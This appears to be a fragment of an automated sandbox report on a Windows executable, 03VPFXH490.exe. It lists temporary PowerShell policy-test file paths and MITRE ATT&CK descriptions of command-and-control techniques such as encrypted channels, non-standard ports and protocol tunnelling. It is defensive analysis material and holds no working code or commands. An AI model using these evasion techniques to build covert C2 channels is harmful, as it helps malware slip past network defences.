C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gbdjcexy.t51.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jdspceyt.x4w.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kcs4nxfe.ays.psm1

Windows Analysis Report
03VPFXH490.exe

Function 00007FFD9BAD0610 Relevance: 2.0, Strings: 1, Instructions: 762
COMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre